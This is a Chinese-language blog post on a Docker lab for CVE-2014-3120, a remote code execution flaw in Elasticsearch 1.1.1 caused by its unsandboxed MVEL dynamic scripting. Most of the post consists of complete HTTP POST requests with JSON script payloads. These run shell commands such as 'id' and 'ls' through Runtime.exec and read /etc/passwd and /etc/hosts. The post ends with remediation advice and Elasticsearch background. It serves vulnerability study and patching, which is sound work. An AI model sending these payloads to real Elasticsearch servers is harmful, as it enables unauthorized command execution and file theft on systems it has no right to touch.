CVE-2014-3120(ElasticSearch 命令执行漏洞)

ElasticSearch 命令执行漏洞

漏洞描述

1.漏洞编号:CVE-2014-3120

2.影响版本:

jre版本:openjdk:8-jre

elasticsearch版本:v1.1.1

3.漏洞产生原因:

相关文档:http://bouk.co/blog/elasticsearch-rce/ https://www.t00ls.net/viewthread.php?tid=29408

 

老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,而MVEL可执行Java代码,而且没有沙盒,所以我们可以直接执行任意代码。

MVEL执行命令的代码如下:

java

import java.io.*;

new java.util.Scanner(Runtime.getRuntime().exec("id").getInputStream()).useDelimiter("\\A").next();

 

启动环境:docker-compose up -d

vulnIP:192.168.0.24

环境启动后,访问`http://your-ip:9200`即可看到ElasticSearch默认首页。

 

 

漏洞发现

关注ElasticSearch的版本

 

 

漏洞利用

Java代码放入json中:

json

{

    "size": 1,

    "query": {

      "filtered": {

        "query": {

          "match_all": {

          }

        }

      }

    },

    "script_fields": {

        "command": {

            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"

        }

    }

  }

 

 首先,该漏洞需要es中至少存在一条数据,所以我们需要先创建一条数据:

POST /website/blog/ HTTP/1.1

Host: your-ip:9200

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 25

 

{

  "name": "phithon"

}

 

然后,执行任意代码:

POST /_search?pretty HTTP/1.1

Host: your-ip:9200

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 343

 

{

    "size": 1,

    "query": {

      "filtered": {

        "query": {

          "match_all": {

          }

        }

      }

    },

    "script_fields": {

        "command": {

            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"

        }

    }

}

 

结果如图:

 

 

既然能执行任意代码,应该也能读取文件:

POST /_search?pretty HTTP/1.1

Host: 192.168.0.24:9200

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 335

 

{

    "size": 1,

    "query": {

      "filtered": {

        "query": {

          "match_all": {

          }

        }

      }

    },

    "script_fields": {

        "command": {

            "script": "import java.io.*;new java.util.Scanner(new File(\"/etc/passwd\")).useDelimiter(\"\\\\A\").next();"

        }

    }

}

 

执行操作系统命令(还可以同时执行多行恶意代码:)

POST /_search?pretty HTTP/1.1

Host: 192.168.1.232:9200

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 526

 

{

    "size": 1,

    "query": {

      "filtered": {

        "query": {

          "match_all": {

          }

        }

      }

    },

    "script_fields": {

        "/etc/hosts": {

            "script": "import java.io.*;new java.util.Scanner(new File(\"/etc/hosts\")).useDelimiter(\"\\\\A\").next();"

            },

            "script_test":{

            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"ls\").getInputStream()).useDelimiter(\"\\\\A\").next();"

        }

    }

}

 

 

问题汇总

 

 

修复方案

1.关掉运行脚本功能,在配置文件elasticsearch.yml里为每个结点都加上:

script.disable_dynamic: true

2.官方会在1.2版本默认关闭动态脚本,升级ElasticSearch1.2版本以上。

https://github.com/elasticsearch/elasticsearch/issues/5853

 

 

基础知识

1. 全文检索:扫描文章中的每一个词,给每一个词建立一个索引指明该词在文章中出现的位置和次数。当进行查询操作时直接根据索引进行查找。

2. 倒排索引:索引表中的每一项都包括一个属性值和具有该属性值的各记录的地址。由于不是由记录来确定属性值,而是由属性值来确定记录的位置,因而称为倒排索引(inverted index)

举个栗子:文档AC里面都有一个词B,我们查找B的时候,是先找到关键词B,再根据B存储的索引找到AC;而不是先找到A,在A里面检索B,再找到C,在C里面检索B

3. ElasticSearch:基于开源的全文检索引擎Lucene,是一个实时分布式搜索和分析引擎,支持全文检索,结构化检索(就是咱们平时用的sql语句的形式)和数据分析等。

4. ES的一些核心概念:

Index:索引,就是我们平时理解的数据库(database)

type:类型,就是表(table)

document:文档,es的最小数据单元。就是表中的一行数据(row)

field:字段,就是列(column)

mapping:映射,就是约束(schema)

 

 

MSF

 

 2021-02-11 23:13:28

 

 

 

posted @ 2021-02-11 23:13  toby123  阅读(1705)  评论(0编辑  收藏  举报